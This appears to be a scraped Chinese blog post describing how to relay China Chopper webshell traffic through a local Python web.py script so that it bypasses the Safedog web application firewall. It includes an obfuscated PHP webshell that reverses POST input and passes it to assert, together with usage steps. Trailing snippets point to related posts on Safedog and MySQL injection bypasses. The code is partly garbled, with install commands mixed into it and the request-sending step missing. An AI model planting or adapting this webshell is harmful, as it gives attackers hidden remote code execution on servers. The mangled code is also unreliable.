前言
在實踐中轉webshell繞過安全狗(一)中,在服務端和客戶端均為php。某大佬提示並分享資源後,打算使用python完成中轉。部分**無恥copy。
本地127.0.0.1,安裝python2
phpshellproxy.py
#coding=utf-8執行需要安裝import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import web
urls = (
'/','index',
'/reverse','reverse',
)#render = web.template.render('templates/')
import json
import urllib
class index:
def get(self):
return 1
class base:
def getpostdata(self, postdata):
#content with &
postdatalist = postdata.split('&')
for pa in postdatalist:
#content with =, can't split with =
index = pa.find("=")
setattr(self,pa[:index],urllib.unquote_plus(pa[index+1:]))
import requests
import codecs, urllib , base64 #, chardet
class reverse(base, object):
def get(self,corpid):
return 1
def post(self):
data = web.data()
#print data
pwdata = data.split('&')[0].split('=')[1]
#print pwdata
#print 'pwdata', pwdata
#print 'pwdata[::-1]', urllib.unquote(urllib.unquote(pwdata.replace('+',' '))[::-1]).replace('&','%26').replace('+','%2b')
newpostdata = data.replace(pwdata, urllib.unquote(urllib.unquote(pwdata.replace('+',' '))[::-1]).replace('&','%26').replace('+','%2b'))
#print 'newpostdata', newpostdata
#r.encoding = 'gb2312'
#print chardet.detect(r.content)
#print r.text
#return r.text
return r.content
if __name__ == "__main__":
pip install web服務端shell端192.168.253.129,安裝安全狗pip install requests
reverse.php
做了點混淆,可過安全狗
<?php替換phpshellproxy.py中的shell位址,需配合reverse.php使用$ds = $_post['x'];
$str = strrev($ds);
$a1 = array("1234","123456");
$a2 = array($str,"5461");
$ma = array_map(null,$a1,$a2)[0][1];
@assert($ma);
執行python phpshellproxy.py 9000 (埠自定義)
使用選單連線對應shell位址,如 http://[ip]:9000/reverse ,輸入對應密碼,配置對應指令碼型別,如果開啟錯誤,建議清掉快取,重新開啟。
本地執行phpshellproxy.py檔案
中國菜刀進行連線 密碼
中轉Webshell 繞過安全狗(一)
前言 聽說中國菜刀裡有後門。抓包我是沒有監測到異常資料報。為了以防萬一,且更好使用中國菜刀硬槓安全狗。筆者收集了一下資料。無恥的copy大佬的原始碼,只是在大佬的基礎上簡單修改了一下,達到webshell繞過安全狗。原理 菜刀不直接向shell傳送資料,而是傳送到中轉的乙個頁面上,這個頁面對接收的引...
中轉Webshell 繞過安全狗(一)
前言 聽說中國菜刀裡有後門。抓包我是沒有監測到異常資料報。為了以防萬一,且更好使用中國菜刀硬槓安全狗。筆者收集了一下資料。無恥的copy大佬的原始碼,只是在大佬的基礎上簡單修改了一下,達到webshell繞過安全狗。原理 菜刀不直接向shell傳送資料,而是傳送到中轉的乙個頁面上,這個頁面對接收的引...
繞安全狗mysql Mysql注入繞過安全狗
mysql注入繞過安全狗 sql注入閉合檢查 sql注入的分類有很多種分法 可以分成數字型和字元型,區別在於是否需要完整閉合。本題中由於我經驗不足,試了好久才想到就是簡單的雙引號加括號就可以閉合了,然後再注釋掉後面的內容。單引號 回顯正常結果 雙引號錯誤回顯 這裡其實可以簡單分析一下,1 是get請...